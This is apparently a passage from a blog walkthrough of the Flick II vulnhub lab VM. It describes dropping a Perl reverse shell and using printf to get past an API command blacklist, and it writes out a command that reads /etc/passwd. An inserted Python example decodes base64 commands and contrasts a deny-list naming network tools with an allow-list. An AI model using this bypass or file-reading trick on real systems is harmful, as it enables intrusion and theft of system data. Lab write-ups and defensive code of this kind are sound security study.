curl-decoder

And execute it:

curl-ok

*boom*

simple-http-server

Nice, now I have placed my Perl reverse shell script on the server!
Let's see if I can find it:

ls-decoder

And execute it again:

ls-banned-command

Oh no! Banned command! Seems like the API blacklists certain commands!

Blacklisting, however, is always vulnerable: I just need to figure out a command that lets me execute any blacklisted command!

After a bit of searching around Stack Overflow I learned that printf is an almighty creature!

It lets me list directories:

printf-ls-tmp1

printf-ls-tmp2

Oh nice, there is my shell!

printf lets me display the contents of files using this syntax:

printf "%s" "$(</etc/passwd)"

printf-to-display-etcpasswd
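To make the point about base64-encoded commands and bypassable blacklists concrete, here is an added Python example (not the author's code and not the FlickII API's own logic): it decodes a payload the way the API must, runs it through a deny-list of program names that the printf form above slips past, and then through an allow-list that rejects anything carrying shell syntax. The banned and permitted names and the sample payloads are constructed assumptions, not values from the VM.

```python
import base64
import re
import shlex

# Constructed deny-list for illustration; the FlickII API's real list is not shown on the page.
BANNED = frozenset({"ls", "cat", "nc", "wget", "curl", "perl", "python", "sh", "bash"})
# Constructed allow-list of harmless status commands an API like this might legitimately need.
PERMITTED = frozenset({"id", "whoami", "uptime"})
SAFE_ARG = re.compile(r"^[A-Za-z0-9_./-]+$")  # no quotes, $, backticks, pipes, redirects


def decode_command(b64: str) -> str:
    """Decode the base64 payload the app puts in its API call back into the shell command."""
    return base64.b64decode(b64).decode("utf-8", errors="replace")


def blacklist_allows(cmd: str) -> bool:
    """Weak check: refuse only if a banned program name appears as a word of the command.
    printf "%s" "$(</etc/passwd)" contains no banned word, so it passes even though the
    $(...) substitution reads a file the deny-list was meant to protect."""
    try:
        words = shlex.split(cmd)
    except ValueError:  # unbalanced quotes: malformed, refuse
        return False
    return not any(w in BANNED for w in words)


def allowlist_allows(cmd: str) -> bool:
    """Stronger check: exactly one permitted program plus plain arguments. Anything carrying
    shell syntax (quotes, $( ), <, ;, |) fails SAFE_ARG, so neither printf nor command
    substitution can smuggle a blocked command through."""
    parts = cmd.split()
    if not parts or parts[0] not in PERMITTED:
        return False
    return all(SAFE_ARG.match(arg) for arg in parts[1:])


def audit(b64_payloads):
    """Return (decoded command, deny-list verdict, allow-list verdict) for each payload."""
    rows = []
    for payload in b64_payloads:
        cmd = decode_command(payload)
        rows.append((cmd, blacklist_allows(cmd), allowlist_allows(cmd)))
    return rows


if __name__ == "__main__":
    # Constructed sample payloads, encoded the same way the app encodes its commands.
    samples = [base64.b64encode(c.encode()).decode()
               for c in ("id", "ls /tmp", 'printf "%s" "$(</etc/passwd)"', "id; ls")]
    for cmd, deny_ok, allow_ok in audit(samples):
        print(f"{cmd!r:36} deny-list allows={deny_ok!s:5}  allow-list allows={allow_ok}")
```

Running it prints one row per sample; the printf row is the only one the deny-list accepts and the allow-list rejects, which is exactly the gap the walkthrough exploits.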

And printf lets me execute it using this neat trick:

printf-execute-banned-commands

Let's try:

shooting-reverse-shell-using-printf

*boom* again:

we-got-shell

This feeling when the reverse shell pops! :-)

This concludes the first part of the writeup!

Now I need to figure out the privesc and become root, so I continue with part II of Flick II.

Thanks to:

@leonjza for providing this awesome VM + Android App!

@edskoudis and the entire SANS team + everyone else that created and supported this year's SANS Holiday Hack Challenge 2016!

If you want to read up on these topics I recommend:

  1. This year's Holiday Hack Challenge
  2. SANS Pen Test – How To’s: Manipulating Android Applications – Youtube Video
  3. Mining Android Secrets (Decoding Android App Resources)
  4. Joshua Wright's presentation from HackFest 2016 on using Android Studio and JadX (PPTX)
  5. Bypassing Certificate Pinning on Android for fun and profit

Thanks for reading to the end!
Feel free to ask questions in the comments!

–> Continue to Part 2 of the Walkthrough Here <–

Merry Christmas!

BR
Sebastian

This entry was posted in boot2root, miscellaneous, vulnhub.

One Response to vulnhub: flickII – a different approach – walkthrough part1

  1. Pingback: vulnhub: flickII – to the root – walkthrough part2 | IT-Unsecurity
